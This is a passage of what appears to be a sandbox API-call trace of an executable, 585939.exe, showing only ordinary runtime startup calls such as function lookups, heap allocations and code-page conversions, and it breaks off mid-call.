[0097.046] atexit (param_1=0x1e90920) returned 0 [0097.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ed88 | out: lpSystemTimeAsFileTime=0x18ed88*(dwLowDateTime=0xb9c5f0b0, dwHighDateTime=0x1d62438)) [0097.063] GetCurrentThreadId () returned 0x808 [0097.063] GetCurrentProcessId () returned 0x54c [0097.063] QueryPerformanceCounter (in: lpPerformanceCount=0x18ed80 | out: lpPerformanceCount=0x18ed80*=21750226109) returned 1 [0097.124] GetStartupInfoW (in: lpStartupInfo=0x18ed18 | out: lpStartupInfo=0x18ed18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0097.142] GetProcessHeap () returned 0x670000 [0097.249] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0097.250] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0097.251] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0097.252] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0097.253] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0097.253] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3bc) returned 0x68f250 [0097.253] GetCurrentThreadId () returned 0x808 [0097.260] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x18) returned 0x6820a0 [0097.260] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x800) returned 0x68f618 [0097.260] GetStartupInfoW (in: lpStartupInfo=0x18ece8 | out: lpStartupInfo=0x18ece8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xa879c5a8, hStdError=0x58)) [0097.260] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0097.260] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0097.261] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0097.261] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" " [0097.261] GetEnvironmentStringsW () returned 0x68fe20* [0097.294] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xaca) returned 0x6908f8 [0097.299] FreeEnvironmentStringsW (penv=0x68fe20) returned 1 [0097.305] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe")) returned 0x30 [0097.305] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x6a) returned 0x68fe20 [0097.305] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x98) returned 0x68fe98 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3e) returned 0x6855d8 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x6c) returned 0x68ff38 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x6e) returned 0x68ffb0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x78) returned 0x682b20 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x62) returned 0x690028 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2e) returned 0x68af18 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x48) returned 0x686ad8 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x28) returned 0x68a910 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1a) returned 0x68ee88 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x4a) returned 0x690098 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x72) returned 0x682ba0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x30) returned 0x68af50 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2e) returned 0x68af88 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1c) returned 0x68eeb0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xd2) returned 0x6900f0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x7c) returned 0x6901d0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x36) returned 0x690258 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3a) returned 0x685620 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x90) returned 0x690298 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x24) returned 0x68a940 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x30) returned 0x68afc0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x36) returned 0x690330 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x48) returned 0x686b28 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x52) returned 0x690370 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3c) returned 0x685668 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x82) returned 0x6903d0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2e) returned 0x68aff8 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1e) returned 0x68eed8 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2c) returned 0x68b030 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x54) returned 0x690460 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x52) returned 0x6904c0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2a) returned 0x68b068 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3c) returned 0x6856b0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x54) returned 0x690520 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x24) returned 0x68a970 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x30) returned 0x68b0a0 [0097.306] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x8c) returned 0x690580 [0097.306] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6908f8 | out: hHeap=0x670000) returned 1 [0097.357] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x800) returned 0x690618 [0097.362] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x80) returned 0x690e20 [0097.403] GetLastError () returned 0x0 [0097.403] SetLastError (dwErrCode=0x0) [0097.403] GetLastError () returned 0x0 [0097.403] SetLastError (dwErrCode=0x0) [0097.404] GetLastError () returned 0x0 [0097.404] SetLastError (dwErrCode=0x0) [0097.404] GetACP () returned 0x4e4 [0097.404] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x220) returned 0x690ea8 [0097.404] GetLastError () returned 0x0 [0097.404] SetLastError (dwErrCode=0x0) [0097.404] IsValidCodePage (CodePage=0x4e4) returned 1 [0097.404] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ecdc | out: lpCPInfo=0x18ecdc) returned 1 [0097.410] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e7a4 | out: lpCPInfo=0x18e7a4) returned 1 [0097.416] GetLastError () returned 0x0 [0097.416] SetLastError (dwErrCode=0x0) [0097.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x18e528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.422] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18e7b8 | out: lpCharType=0x18e7b8) returned 1 [0097.422] GetLastError () returned 0x0 [0097.422] SetLastError (dwErrCode=0x0) [0097.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x18e4f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.428] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0097.429] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e2e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0097.429] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18eab8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿXÄy¨ôì\x18", lpUsedDefaultChar=0x0) returned 256 [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.429] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebb8, cbMultiByte=256, lpWideCharStr=0x18e508, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.429] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0097.429] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e2f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0097.429] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e9b8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿXÄy¨ôì\x18", lpUsedDefaultChar=0x0) returned 256 [0097.435] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0097.435] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40d9f2 [0097.471] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0097.498] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1f) returned 0x68ef00 [0097.498] WideCharToMultiByte (in: 